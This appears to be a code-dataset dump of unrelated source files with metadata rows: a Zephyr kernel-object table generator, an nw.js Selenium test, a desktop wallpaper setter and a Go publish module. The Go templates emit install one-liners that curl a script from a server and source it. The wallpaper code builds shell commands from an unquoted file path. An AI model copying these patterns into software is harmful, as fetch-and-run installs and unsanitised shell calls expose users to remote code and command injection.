# Step 2: filter type_env to only contain kernel objects, or structs
# and arrays of kernel objects
bad_offsets = []
for offset, type_object in type_env.items():
if not type_object.has_kobject():
bad_offsets.append(offset)
for offset in bad_offsets:
del type_env[offset]
# Step 3: Now that we know all the types we are looking for, examine
# all variables
all_objs = {}
for die in variables:
name = die_get_name(die)
if not name:
continue
if name.startswith("__init_sys_init"):
# Boot-time initialization function; not an actual device
continue
type_offset = die_get_type_offset(die)
# Is this a kernel object, or a structure containing kernel
# objects?
if type_offset not in type_env:
continue
if "DW_AT_declaration" in die.attributes:
# Extern declaration, only used indirectly
extern_env[die.offset] = die
continue
if "DW_AT_location" not in die.attributes:
debug_die(die,
"No location information for object '%s'; possibly stack allocated"
% name)
continue
loc = die.attributes["DW_AT_location"]
if loc.form != "DW_FORM_exprloc" and \
loc.form != "DW_FORM_block1":
debug_die(die, "kernel object '%s' unexpected location format" %
name)
continue
opcode = loc.value[0]
if opcode != DW_OP_addr:
# Check if frame pointer offset DW_OP_fbreg
if opcode == DW_OP_fbreg:
debug_die(die, "kernel object '%s' found on stack" % name)
else:
debug_die(die,
"kernel object '%s' unexpected exprloc opcode %s" %
(name, hex(opcode)))
continue
addr = (loc.value[1] | (loc.value[2] << 8) |
(loc.value[3] << 16) | (loc.value[4] << 24))
if addr == 0:
# Never linked; gc-sections deleted it
continue
type_obj = type_env[type_offset]
objs = type_obj.get_kobjects(addr)
all_objs.update(objs)
debug("symbol '%s' at %s contains %d object(s)"
% (name, hex(addr), len(objs)))
# Step 4: objs is a dictionary mapping variable memory addresses to
# their associated type objects. Now that we have seen all variables
# and can properly look up API structs, convert this into a dictionary
# mapping variables to the C enumeration of what kernel object type it
# is.
ret = {}
for addr, ko in all_objs.items():
# API structs don't get into the gperf table
if ko.type_obj.api:
continue
_, user_ram_allowed = kobjects[ko.type_obj.name]
if not user_ram_allowed and app_smem_start <= addr < app_smem_end:
debug_die(die, "object '%s' found in invalid location %s"
% (name, hex(addr)))
continue
if ko.type_obj.name != "device":
# Not a device struct so we immediately know its type
ko.type_name = kobject_to_enum(ko.type_obj.name)
ret[addr] = ko
continue
# Device struct. Need to get the address of its API struct,
# if it has one.
apiaddr = device_get_api_addr(elf, addr)
if apiaddr not in all_objs:
if apiaddr == 0:
debug("device instance at 0x%x has no associated subsystem"
% addr)
else:
debug("device instance at 0x%x has unknown API 0x%x"
% (addr, apiaddr))
# API struct does not correspond to a known subsystem, skip it
continue
apiobj = all_objs[apiaddr]
ko.type_name = subsystem_to_enum(apiobj.type_obj.name)
ret[addr] = ko
debug("found %d kernel object instances total" % len(ret))
# 1. Before python 3.7 dict order is not guaranteed. With Python
# 3.5 it doesn't seem random with *integer* keys but can't
# rely on that.
# 2. OrderedDict means _insertion_ order, so not enough because
# built from other (random!) dicts: need to _sort_ first.
# 3. Sorting memory address looks good.
return OrderedDict(sorted(ret.items()))
def get_symbols(elf):
for section in elf.iter_sections():
if isinstance(section, SymbolTableSection):
return {sym.name: sym.entry.st_value
for sym in section.iter_symbols()}
raise LookupError("Could not find symbol table")
# -- GPERF generation logic
header = """%compare-lengths
%define lookup-function-name z_object_lookup
%language=ANSI-C
%global-table
%struct-type
%{
#include <kernel.h>
#include <toolchain.h>
#include <syscall_handler.h>
#include <string.h>
%}
struct z_object;
"""
# Different versions of gperf have different prototypes for the lookup
# function, best to implement the wrapper here. The pointer value itself is
# turned into a string, we told gperf to expect binary strings that are not
# NULL-terminated.
footer = """%%
struct z_object *z_object_gperf_find(void *obj)
{
return z_object_lookup((const char *)obj, sizeof(void *));
}
void z_object_gperf_wordlist_foreach(_wordlist_cb_func_t func, void *context)
{
int i;
for (i = MIN_HASH_VALUE; i <= MAX_HASH_VALUE; i++) {
if (wordlist[i].name != NULL) {
func(&wordlist[i], context);
}
}
}
#ifndef CONFIG_DYNAMIC_OBJECTS
struct z_object *z_object_find(void *obj)
ALIAS_OF(z_object_gperf_find);
void z_object_wordlist_foreach(_wordlist_cb_func_t func, void *context)
ALIAS_OF(z_object_gperf_wordlist_foreach);
#endif
"""
def write_gperf_table(fp, syms, objs, little_endian, static_begin, static_end):
fp.write(header)
if sys_mutex_counter != 0:
fp.write("static struct k_mutex kernel_mutexes[%d] = {\n"
% sys_mutex_counter)
for i in range(sys_mutex_counter):
fp.write("Z_MUTEX_INITIALIZER(kernel_mutexes[%d])" % i)
if i != sys_mutex_counter - 1:
fp.write(", ")
fp.write("};\n")
if futex_counter != 0:
fp.write("static struct z_futex_data futex_data[%d] = {\n"
% futex_counter)
for i in range(futex_counter):
fp.write("Z_FUTEX_DATA_INITIALIZER(futex_data[%d])" % i)
if i != futex_counter - 1:
fp.write(", ")
fp.write("};\n")
metadata_names = {
"K_OBJ_THREAD" : "thread_id",
"K_OBJ_SYS_MUTEX" : "mutex",
"K_OBJ_FUTEX" : "futex_data"
}
if "CONFIG_GEN_PRIV_STACKS" in syms:
metadata_names["K_OBJ_THREAD_STACK_ELEMENT"] = "stack_data"
if stack_counter != 0:
fp.write("static u8_t Z_GENERIC_SECTION(.priv_stacks.noinit) "
" __aligned(Z_PRIVILEGE_STACK_ALIGN)"
" priv_stacks[%d][CONFIG_PRIVILEGED_STACK_SIZE];\n"
% stack_counter)
fp.write("static struct z_stack_data stack_data[%d] = {\n"
% stack_counter)
counter = 0
for _, ko in objs.items():
if ko.type_name != "K_OBJ_THREAD_STACK_ELEMENT":
continue
# ko.data currently has the stack size. fetch the value to
# populate the appropriate entry in stack_data, and put
# a reference to the entry in stack_data into the data value
# instead
size = ko.data
ko.data = "&stack_data[%d]" % counter
fp.write("\t{ %d, (u8_t *)(&priv_stacks[%d]) }"
% (size, counter))
if counter != (stack_counter - 1):
fp.write(",")
fp.write("\n")
counter += 1
fp.write("};\n")
else:
metadata_names["K_OBJ_THREAD_STACK_ELEMENT"] = "stack_size"
fp.write("%%\n")
# Setup variables for mapping thread indexes
thread_max_bytes = syms["CONFIG_MAX_THREAD_BYTES"]
thread_idx_map = {}
for i in range(0, thread_max_bytes):
thread_idx_map[i] = 0xFF
for obj_addr, ko in objs.items():
obj_type = ko.type_name
# pre-initialized objects fall within this memory range, they are
# either completely initialized at build time, or done automatically
# at boot during some PRE_KERNEL_* phase
initialized = static_begin <= obj_addr < static_end
is_driver = obj_type.startswith("K_OBJ_DRIVER_")
if "CONFIG_64BIT" in syms:
format_code = "Q"
else:
format_code = "I"
if little_endian:
endian = "<"
else:
endian = ">"
byte_str = struct.pack(endian + format_code, obj_addr)
fp.write("\"")
for byte in byte_str:
val = "\\x%02x" % byte
fp.write(val)
flags = "0"
if initialized:
flags += " | K_OBJ_FLAG_INITIALIZED"
if is_driver:
flags += " | K_OBJ_FLAG_DRIVER"
if ko.type_name in metadata_names:
tname = metadata_names[ko.type_name]
else:
tname = "unused"
fp.write("\", {}, %s, %s, { .%s = %s }\n" % (obj_type, flags,
tname, str(ko.data)))
if obj_type == "K_OBJ_THREAD":
idx = math.floor(ko.data / 8)
bit = ko.data % 8
thread_idx_map[idx] = thread_idx_map[idx] & ~(2**bit)
fp.write(footer)
# Generate the array of already mapped thread indexes
fp.write('\n')
fp.write('Z_GENERIC_SECTION(.kobject_data.data) ')
fp.write('u8_t _thread_idx_map[%d] = {' % (thread_max_bytes))
for i in range(0, thread_max_bytes):
fp.write(' 0x%x, ' % (thread_idx_map[i]))
fp.write('};\n')
driver_macro_tpl = """
#define Z_SYSCALL_DRIVER_%(driver_upper)s(ptr, op) Z_SYSCALL_DRIVER_GEN(ptr, op, %(driver_lower)s, %(driver_upper)s)
"""
def write_validation_output(fp):
fp.write("#ifndef DRIVER_VALIDATION_GEN_H\n")
fp.write("#define DRIVER_VALIDATION_GEN_H\n")
fp.write("""#define Z_SYSCALL_DRIVER_GEN(ptr, op, driver_lower_case, driver_upper_case) \\
(Z_SYSCALL_OBJ(ptr, K_OBJ_DRIVER_##driver_upper_case) || \\
Z_SYSCALL_DRIVER_OP(ptr, driver_lower_case##_driver_api, op))
""")
for subsystem in subsystems:
subsystem = subsystem.replace("_driver_api", "")
fp.write(driver_macro_tpl % {
"driver_lower": subsystem.lower(),
"driver_upper": subsystem.upper(),
})
fp.write("#endif /* DRIVER_VALIDATION_GEN_H */\n")
def write_kobj_types_output(fp):
fp.write("/* Core kernel objects */\n")
for kobj, obj_info in kobjects.items():
dep, _ = obj_info
if kobj == "device":
continue
if dep:
fp.write("#ifdef %s\n" % dep)
fp.write("%s,\n" % kobject_to_enum(kobj))
if dep:
fp.write("#endif\n")
fp.write("/* Driver subsystems */\n")
for subsystem in subsystems:
subsystem = subsystem.replace("_driver_api", "").upper()
fp.write("K_OBJ_DRIVER_%s,\n" % subsystem)
def write_kobj_otype_output(fp):
fp.write("/* Core kernel objects */\n")
for kobj, obj_info in kobjects.items():
dep, _ = obj_info
if kobj == "device":
continue
if dep:
fp.write("#ifdef %s\n" % dep)
fp.write('case %s: ret = "%s"; break;\n' %
(kobject_to_enum(kobj), kobj))
if dep:
fp.write("#endif\n")
fp.write("/* Driver subsystems */\n")
for subsystem in subsystems:
subsystem = subsystem.replace("_driver_api", "")
fp.write('case K_OBJ_DRIVER_%s: ret = "%s driver"; break;\n' % (
subsystem.upper(),
subsystem
))
def write_kobj_size_output(fp):
fp.write("/* Non device/stack objects */\n")
for kobj, obj_info in kobjects.items():
dep, _ = obj_info
# device handled by default case. Stacks are not currently handled,
# if they eventually are it will be a special case.
if kobj in {"device", STACK_TYPE}:
continue
if dep:
fp.write("#ifdef %s\n" % dep)
fp.write('case %s: ret = sizeof(struct %s); break;\n' %
(kobject_to_enum(kobj), kobj))
if dep:
fp.write("#endif\n")
def parse_subsystems_list_file(path):
with open(path, "r") as fp:
subsys_list = json.load(fp)
subsystems.extend(subsys_list)
def parse_args():
global args
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-k", "--kernel", required=False,
help="Input zephyr ELF binary")
parser.add_argument(
"-g", "--gperf-output", required=False,
help="Output list of kernel object addresses for gperf use")
parser.add_argument(
"-V", "--validation-output", required=False,
help="Output driver validation macros")
parser.add_argument(
"-K", "--kobj-types-output", required=False,
help="Output k_object enum constants")
parser.add_argument(
"-S", "--kobj-otype-output", required=False,
help="Output case statements for otype_to_str()")
parser.add_argument(
"-Z", "--kobj-size-output", required=False,
help="Output case statements for obj_size_get()")
parser.add_argument("-i", "--include-subsystem-list", required=False, action='append',
help='''Specifies a file with a JSON encoded list of subsystem names to append to
the driver subsystems list. Can be specified multiple times:
-i file1 -i file2 ...''')
parser.add_argument("-v", "--verbose", action="store_true",
help="Print extra debugging information")
args = parser.parse_args()
if "VERBOSE" in os.environ:
args.verbose = 1
def main():
parse_args()
if args.include_subsystem_list is not None:
for list_file in args.include_subsystem_list:
parse_subsystems_list_file(list_file)
if args.gperf_output:
assert args.kernel, "--kernel ELF required for --gperf-output"
elf = ELFFile(open(args.kernel, "rb"))
syms = get_symbols(elf)
max_threads = syms["CONFIG_MAX_THREAD_BYTES"] * 8
objs = find_kobjects(elf, syms)
if not objs:
sys.stderr.write("WARNING: zero kobject found in %s\n"
% args.kernel)
if thread_counter > max_threads:
sys.exit("Too many thread objects ({})\n"
"Increase CONFIG_MAX_THREAD_BYTES to {}"
.format(thread_counter, -(-thread_counter // 8)))
with open(args.gperf_output, "w") as fp:
write_gperf_table(fp, syms, objs, elf.little_endian,
syms["_static_kernel_objects_begin"],
syms["_static_kernel_objects_end"])
if args.validation_output:
with open(args.validation_output, "w") as fp:
write_validation_output(fp)
if args.kobj_types_output:
with open(args.kobj_types_output, "w") as fp:
write_kobj_types_output(fp)
if args.kobj_otype_output:
with open(args.kobj_otype_output, "w") as fp:
write_kobj_otype_output(fp)
if args.kobj_size_output:
with open(args.kobj_size_output, "w") as fp:
write_kobj_size_output(fp)
if __name__ == "__main__":
main()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
test/sanity/require-methods/test.py
|
import time
import os
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
chrome_options.add_argument("nwapp=" + os.path.dirname(os.path.abspath(__file__)))
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
try:
print driver.current_url
result = driver.find_element_by_id('require-resolve').get_attribute('innerHTML')
print result
assert('success' in result)
result = driver.find_element_by_id('require-cache').get_attribute('innerHTML')
print result
assert('success' in result)
result = driver.find_element_by_id('require-extensions').get_attribute('innerHTML')
print result
assert('success' in result)
finally:
driver.quit()
|
[] |
[] |
[
"CHROMEDRIVER"
] |
[]
|
["CHROMEDRIVER"]
|
python
| 1 | 0 | |
dynpaper/desktop.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright © 2016 Bharadwaj Raju <[email protected]>
# All Rights Reserved.
# Original code taken from the following answers by StackOverflow user
# Martin Hansen (http://stackoverflow.com/users/2118300/martin-hansen):
# - http://stackoverflow.com/a/21213358/5413945
# - http://stackoverflow.com/a/21213504/5413945
# This file is part of WeatherDesk.
#
# WeatherDesk is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WeatherDesk is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WeatherDesk (in the LICENSE file).
# If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import subprocess
import configparser
from textwrap import dedent
# Library to set wallpaper and find desktop - Cross-platform
def get_desktop_environment():
if sys.platform in ['win32', 'cygwin']:
return 'windows'
elif sys.platform == 'darwin':
return 'mac'
else:
desktop_session = os.environ.get(
'XDG_CURRENT_DESKTOP') or os.environ.get('DESKTOP_SESSION')
if desktop_session is not None:
desktop_session = desktop_session.lower()
# Fix for X-Cinnamon etc
if desktop_session.startswith('x-'):
desktop_session = desktop_session.replace('x-', '')
if desktop_session in ['gnome', 'unity', 'cinnamon', 'mate',
'xfce4', 'lxde', 'fluxbox',
'blackbox', 'openbox', 'icewm', 'jwm',
'afterstep', 'trinity', 'kde', 'pantheon',
'i3', 'lxqt', 'awesome']:
return desktop_session
# -- Special cases --#
# Canonical sets $DESKTOP_SESSION to Lubuntu rather than LXDE if using LXDE.
# There is no guarantee that they will not do the same with the other desktop environments.
# In Ubuntu 17.04, $DESKTOP_SESSION is set to 'Unity:Unity7' instead of 'Unity' when using Unity
elif 'xfce' in desktop_session or desktop_session.startswith('xubuntu'):
return 'xfce4'
elif desktop_session.startswith('ubuntu') or desktop_session.startswith('unity'):
return 'unity'
elif desktop_session.startswith('lubuntu'):
return 'lxde'
elif desktop_session.startswith('kubuntu'):
return 'kde'
elif desktop_session.startswith('razor'):
return 'razor-qt'
elif desktop_session.startswith('wmaker'):
return 'windowmaker'
if os.environ.get('KDE_FULL_SESSION') == 'true':
return 'kde'
elif os.environ.get('GNOME_DESKTOP_SESSION_ID'):
if not 'deprecated' in os.environ.get('GNOME_DESKTOP_SESSION_ID'):
return 'gnome2'
elif is_running('xfce-mcs-manage'):
return 'xfce4'
elif is_running('ksmserver'):
return 'kde'
return 'unknown'
def is_running(process):
try: # Linux/Unix
s = subprocess.Popen(['ps', 'axw'], stdout=subprocess.PIPE)
except: # Windows
s = subprocess.Popen(['tasklist', '/v'], stdout=subprocess.PIPE)
process_list, err = s.communicate()
return process in str(process_list)
def set_wallpaper(image, desktop_env=get_desktop_environment()):
image = os.path.expanduser(image)
if desktop_env in ['gnome', 'unity', 'cinnamon', 'pantheon']:
uri = f'file://{image}'
try:
from gi.repository import Gio
SCHEMA = 'org.gnome.desktop.background'
KEY = 'picture-uri'
gsettings = Gio.Settings.new(SCHEMA)
gsettings.set_string(KEY, uri)
except:
args = ['gsettings', 'set',
'org.gnome.desktop.background', 'picture-uri', uri]
subprocess.Popen(args)
elif desktop_env == 'mate':
try: # MATE >= 1.6
args = ['gsettings', 'set', 'org.mate.background',
'picture-filename', '%s' % image]
subprocess.Popen(args)
except: # MATE < 1.6
args = ['mateconftool-2', '-t', 'string', '--set', '/desktop/mate/background/picture_filename',
'%s' % image]
subprocess.Popen(args)
elif desktop_env == 'gnome2':
args = ['gconftool-2', '-t', 'string', '--set',
'/desktop/gnome/background/picture_filename', '%s' % image]
subprocess.Popen(args)
elif desktop_env == 'kde':
kde_script = dedent(
'''\
var Desktops = desktops();
for (i=0;i<Desktops.length;i++) {
d = Desktops[i];
d.wallpaperPlugin = "org.kde.image";
d.currentConfigGroup = Array("Wallpaper",
"org.kde.image",
"General");
d.writeConfig("Image", "file://%s")
}
''') % image
subprocess.Popen(
['dbus-send',
'--session',
'--dest=org.kde.plasmashell',
'--type=method_call',
'/PlasmaShell',
'org.kde.PlasmaShell.evaluateScript',
'string:{}'.format(kde_script)]
)
elif desktop_env in ['kde3', 'trinity']:
args = 'dcop kdesktop KBackgroundIface setWallpaper 0 "%s" 6' % image
subprocess.Popen(args, shell=True)
elif desktop_env == 'xfce4':
# XFCE4's image property is not image-path but last-image (What?)
# Only GNOME seems to have a sane wallpaper interface
# Update: the monitor id thing seems to be changed in
# XFCE 4.12 to just monitor0 instead of monitorVGA1 or something
# So now we need to do both.
list_of_properties_cmd = subprocess.Popen(['bash -c "xfconf-query -R -l -c xfce4-desktop -p /backdrop"'],
shell=True, stdout=subprocess.PIPE)
list_of_properties, list_of_properties_err = list_of_properties_cmd.communicate()
list_of_properties = list_of_properties.decode('utf-8')
for i in list_of_properties.split('\n'):
if i.endswith('last-image'):
# The property given is a background property
subprocess.Popen(
['xfconf-query -c xfce4-desktop -p %s -s "%s"' %
(i, image)],
shell=True)
subprocess.Popen(['xfdesktop --reload'], shell=True)
elif desktop_env == 'razor-qt':
desktop_conf = configparser.ConfigParser()
# Development version
desktop_conf_file = os.path.join(
get_config_dir('razor'), 'desktop.conf')
if os.path.isfile(desktop_conf_file):
config_option = r'screens\1\desktops\1\wallpaper'
else:
desktop_conf_file = os.path.join(
os.path.expanduser('~'), '.razor/desktop.conf')
config_option = r'desktops\1\wallpaper'
desktop_conf.read(os.path.join(desktop_conf_file))
try:
import codecs
# only replacing a value
if desktop_conf.has_option('razor', config_option):
desktop_conf.set('razor', config_option, image)
with codecs.open(desktop_conf_file, 'w', encoding='utf-8', errors='replace') as f:
desktop_conf.write(f)
except:
pass
elif desktop_env in ['fluxbox', 'jwm', 'openbox', 'afterstep', 'i3']:
try:
args = ['feh', '--bg-scale', image]
subprocess.Popen(args)
except:
sys.stderr.write('Error: Failed to set wallpaper with feh!')
sys.stderr.write('Please make sre that You have feh installed.')
elif desktop_env == 'icewm':
args = ['icewmbg', image]
subprocess.Popen(args)
elif desktop_env == 'blackbox':
args = ['bsetbg', '-full', image]
subprocess.Popen(args)
elif desktop_env == 'lxde':
args = 'pcmanfm --set-wallpaper %s --wallpaper-mode=scaled' % image
subprocess.Popen(args, shell=True)
elif desktop_env == 'lxqt':
args = 'pcmanfm-qt --set-wallpaper %s --wallpaper-mode=scaled' % image
subprocess.Popen(args, shell=True)
elif desktop_env == 'windowmaker':
args = 'wmsetbg -s -u %s' % image
subprocess.Popen(args, shell=True)
elif desktop_env == 'enlightenment':
args = 'enlightenment_remote -desktop-bg-add 0 0 0 0 %s' % image
subprocess.Popen(args, shell=True)
elif desktop_env == 'awesome':
with subprocess.Popen("awesome-client", stdin=subprocess.PIPE) as awesome_client:
command = 'local gears = require("gears"); for s = 1, screen.count() do gears.wallpaper.maximized("%s", s, true); end;' % image
awesome_client.communicate(input=bytes(command, 'UTF-8'))
elif desktop_env == 'windows':
# Update Windows Registry and Force Desktop Reload
os.system(
'''reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d %s /f''' % image)
os.system(
'''RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True''')
elif desktop_env == 'mac':
try:
from appscript import app, mactypes
app('Finder').desktop_picture.set(mactypes.File(image))
except ImportError:
OSX_SCRIPT = '''tell application "System Events"
set desktopCount to count of desktops
repeat with desktopNumber from 1 to desktopCount
tell desktop desktopNumber
set picture to POSIX file "%s"
end tell
end repeat
end tell
''' % image
osx_script_file = open(os.path.expanduser(
'~/.weatherdesk_script.AppleScript'), 'w')
osx_script_file.truncate()
osx_script_file = open(os.path.expanduser(
'~/.weatherdesk_script.AppleScript'), 'w')
osx_script_file.truncate()
osx_script_file.write(OSX_SCRIPT)
osx_script_file.close()
subprocess.Popen(
['/usr/bin/osascript', os.path.abspath(os.path.expanduser('~/.weatherdesk_script.AppleScript'))])
else:
sys.stderr.write(
'Error: Failed to set wallpaper. (Desktop not supported)')
return False
return True
def get_config_dir(app_name):
if 'XDG_CONFIG_HOME' in os.environ:
confighome = os.environ['XDG_CONFIG_HOME']
elif 'APPDATA' in os.environ: # On Windows
confighome = os.environ['APPDATA']
else:
try:
from xdg import BaseDirectory
confighome = BaseDirectory.xdg_config_home
except ImportError: # Most likely a Linux/Unix system anyway
confighome = os.path.join(os.path.expanduser('~'), '.config')
configdir = os.path.join(confighome, app_name)
return configdir
|
[] |
[] |
[
"DESKTOP_SESSION",
"GNOME_DESKTOP_SESSION_ID",
"APPDATA",
"KDE_FULL_SESSION",
"XDG_CURRENT_DESKTOP",
"XDG_CONFIG_HOME"
] |
[]
|
["DESKTOP_SESSION", "GNOME_DESKTOP_SESSION_ID", "APPDATA", "KDE_FULL_SESSION", "XDG_CURRENT_DESKTOP", "XDG_CONFIG_HOME"]
|
python
| 6 | 0 | |
core/code/publish.go
|
package code
import (
"fmt"
"os"
"path"
"runtime"
"strings"
ice "github.com/shylinux/icebergs"
"github.com/shylinux/icebergs/base/aaa"
"github.com/shylinux/icebergs/base/cli"
"github.com/shylinux/icebergs/base/mdb"
"github.com/shylinux/icebergs/base/nfs"
"github.com/shylinux/icebergs/base/tcp"
"github.com/shylinux/icebergs/base/web"
kit "github.com/shylinux/toolkits"
)
func _publish_file(m *ice.Message, file string, arg ...string) string {
if strings.HasSuffix(file, "ice.bin") {
// 打包应用
arg = append(arg, kit.Keys("ice", runtime.GOOS, runtime.GOARCH))
if _, e := os.Stat(path.Join(m.Conf(PUBLISH, kit.META_PATH), kit.Select(path.Base(file), arg, 0))); e == nil {
return ""
}
} else if s, e := os.Stat(file); m.Assert(e) && s.IsDir() {
// 打包目录
p := path.Base(file) + ".tar.gz"
m.Cmd(cli.SYSTEM, "tar", "-zcf", p, file)
defer func() { os.Remove(p) }()
file = p
}
// 发布文件
target := path.Join(m.Conf(PUBLISH, kit.META_PATH), kit.Select(path.Base(file), arg, 0))
m.Log_EXPORT(PUBLISH, target, kit.MDB_FROM, file)
m.Cmd(nfs.LINK, target, file)
return target
}
const PUBLISH = "publish"
func init() {
Index.Merge(&ice.Context{
Commands: map[string]*ice.Command{
ice.CTX_INIT: {Hand: func(m *ice.Message, c *ice.Context, cmd string, arg ...string) {
m.Cmd(aaa.ROLE, aaa.WHITE, aaa.VOID, m.Prefix(PUBLISH))
m.Cmd(aaa.ROLE, aaa.WHITE, aaa.VOID, ice.USR_PUBLISH)
m.Conf(PUBLISH, kit.Keym(ice.CONTEXTS), _contexts)
}},
PUBLISH: {Name: "publish path auto create volcanos icebergs intshell package dream", Help: "发布", Action: map[string]*ice.Action{
mdb.CREATE: {Name: "create file", Help: "添加", Hand: func(m *ice.Message, arg ...string) {
_publish_file(m, m.Option(kit.MDB_FILE))
}},
ice.VOLCANOS: {Name: "volcanos", Help: "火山架", Hand: func(m *ice.Message, arg ...string) {
defer func() { m.EchoQRCode(m.Option(ice.MSG_USERWEB)) }()
defer func() { m.Cmdy(PUBLISH, ice.CONTEXTS, "miss") }()
m.Cmd(PUBLISH, mdb.CREATE, kit.MDB_FILE, ice.ETC_MISS)
m.Cmd(PUBLISH, mdb.CREATE, kit.MDB_FILE, ice.GO_MOD)
m.Cmd(nfs.DEFS, path.Join(m.Conf(PUBLISH, kit.META_PATH), ice.ORDER_JS), m.Conf(PUBLISH, kit.Keym(JS)))
m.Cmd(nfs.DEFS, path.Join(ice.USR_VOLCANOS, "page/cache.css"), "")
m.Cmd(nfs.DEFS, path.Join(ice.USR_VOLCANOS, "page/cache.js"), "")
m.Option(nfs.DIR_DEEP, ice.TRUE)
m.Option(nfs.DIR_REG, `.*\.(html|css|js)$`)
m.Option(nfs.DIR_ROOT, m.Conf(PUBLISH, kit.META_PATH))
m.Cmdy(nfs.DIR, "./", "time,size,line,path,link")
}},
ice.ICEBERGS: {Name: "icebergs", Help: "冰山架", Hand: func(m *ice.Message, arg ...string) {
defer func() { m.Cmdy(PUBLISH, ice.CONTEXTS, "base") }()
m.Cmd(PUBLISH, mdb.CREATE, kit.MDB_FILE, ice.BIN_ICE_SH)
m.Cmd(PUBLISH, mdb.CREATE, kit.MDB_FILE, ice.BIN_ICE_BIN)
p := m.Option(cli.CMD_DIR, m.Conf(PUBLISH, kit.META_PATH))
ls := strings.Split(strings.TrimSpace(m.Cmd(cli.SYSTEM, "bash", "-c", "ls |xargs file |grep executable").Append(cli.CMD_OUT)), ice.MOD_NL)
for _, ls := range ls {
if file := strings.TrimSpace(strings.Split(ls, ":")[0]); file != "" {
if s, e := os.Stat(path.Join(p, file)); e == nil {
m.Push(kit.MDB_TIME, s.ModTime())
m.Push(kit.MDB_SIZE, kit.FmtSize(s.Size()))
m.Push(kit.MDB_FILE, file)
m.PushDownload(kit.MDB_LINK, file, path.Join(p, file))
}
}
}
m.SortTimeR(kit.MDB_TIME)
}},
ice.INTSHELL: {Name: "intshell", Help: "神农架", Hand: func(m *ice.Message, arg ...string) {
defer func() { m.Cmdy(PUBLISH, ice.CONTEXTS, "tmux") }()
m.Cmd(nfs.DEFS, path.Join(m.Conf(PUBLISH, kit.META_PATH), ice.ORDER_SH), m.Conf(PUBLISH, kit.Keym(SH)))
m.Option(nfs.DIR_DEEP, ice.TRUE)
m.Option(nfs.DIR_REG, ".*\\.(sh|vim|conf)$")
m.Option(nfs.DIR_ROOT, m.Conf(PUBLISH, kit.META_PATH))
m.Cmdy(nfs.DIR, "./", "time,size,line,path,link")
}},
ice.CONTEXTS: {Name: "contexts", Help: "环境", Hand: func(m *ice.Message, arg ...string) {
u := kit.ParseURL(tcp.ReplaceLocalhost(m, m.Option(ice.MSG_USERWEB)))
host := u.Host
m.Option("httphost", fmt.Sprintf("%s://%s:%s", u.Scheme, strings.Split(host, ":")[0], kit.Select(kit.Select("80", "443", u.Scheme == "https"), strings.Split(host, ":"), 1)))
m.Option("hostport", fmt.Sprintf("%s:%s", strings.Split(host, ":")[0], kit.Select(kit.Select("80", "443", u.Scheme == "https"), strings.Split(host, ":"), 1)))
m.Option("hostname", strings.Split(host, ":")[0])
m.Option("userhost", fmt.Sprintf("%s@%s", m.Option(ice.MSG_USERNAME), strings.Split(host, ":")[0]))
m.Option("hostpath", kit.Path("./.ish/pluged"))
if len(arg) == 0 {
arg = append(arg, "tmux", "base", "miss", "binary", "source", "project")
}
for _, k := range arg {
if buf, err := kit.Render(m.Conf(PUBLISH, kit.Keym(ice.CONTEXTS, k)), m); m.Assert(err) {
m.EchoScript(strings.TrimSpace(string(buf)))
}
}
}},
"package": {Name: "package", Help: "依赖", Hand: func(m *ice.Message, arg ...string) {
web.PushStream(m)
p := kit.Path(ice.USR_PUBLISH)
m.Option(cli.CMD_DIR, kit.Path(os.Getenv("HOME")))
// m.Cmdy(cli.SYSTEM, "tar", "-zcvf", "go.tar.gz", "go/pkg")
// m.Cmdy(cli.SYSTEM, "mv", "go.tar.gz", p)
m.Cmdy(cli.SYSTEM, "tar", "-zcvf", "vim.tar.gz", ".vim/plugged")
m.Cmdy(cli.SYSTEM, "mv", "vim.tar.gz", p)
m.Toast("打包成功")
m.ProcessHold()
}},
mdb.REMOVE: {Name: "remove", Help: "删除", Hand: func(m *ice.Message, arg ...string) {
p := m.Option(cli.CMD_DIR, m.Conf(PUBLISH, kit.META_PATH))
os.Remove(path.Join(p, m.Option(kit.MDB_PATH)))
}},
mdb.INPUTS: {Name: "inputs", Help: "补全", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(web.DREAM, mdb.INPUTS, arg)
}},
web.DREAM: {Name: "dream name=hi repos", Help: "启动", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(web.DREAM, tcp.START, arg)
m.Process(ice.PROCESS_OPEN, kit.MergeURL(m.Option(ice.MSG_USERWEB),
cli.POD, kit.Keys(m.Option(ice.MSG_USERPOD), m.Option(kit.MDB_NAME))))
}},
}, Hand: func(m *ice.Message, c *ice.Context, cmd string, arg ...string) {
m.Option(nfs.DIR_ROOT, m.Conf(PUBLISH, kit.META_PATH))
m.Cmdy(nfs.DIR, kit.Select("", arg, 0), "time,size,path,action,link")
}},
},
Configs: map[string]*ice.Config{
PUBLISH: {Name: PUBLISH, Help: "发布", Value: kit.Data(
kit.MDB_PATH, "usr/publish", ice.CONTEXTS, _contexts,
SH, `#!/bin/bash
echo "hello world"
`,
JS, `Volcanos("onengine", {_init: function(can, sub) {
can.base.Log("hello volcanos world")
}, river: {
}})
`,
)},
},
})
}
var _contexts = kit.Dict(
"project", `# 创建项目
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp project
`,
"source", `# 源码安装
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp source
`,
"binary", `# 应用安装
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp binary
`,
"miss", `# 开发环境
